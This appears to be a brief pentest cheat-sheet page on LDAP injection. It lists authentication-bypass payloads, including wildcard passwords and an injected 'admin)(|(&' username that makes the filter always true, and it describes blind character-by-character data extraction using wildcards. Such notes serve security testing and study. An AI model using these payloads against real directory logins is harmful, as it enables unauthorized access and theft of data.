Auth bypass#

If we know a username, we can put * in password field, resulting a query like this

(&(uid=admin)(userPassword=*))

If we don’t have any username, then put * in both field, resulting this query

(&(uid=*)(userPassword=*))

If we cannot use wildcard, and know a username, we can try admin)(|(& in username and abc) in password. We basically use OR | with (&), which is always true

(&(uid=admin)(|(&)(userPassword=abc)))

Data Exfiltration#

Input wildcard *

If blind injection, brute force 1 character at a time using wildcard like this

a*
b*
c*
Backward Hosts Header Attacks Mongodb Injection Forward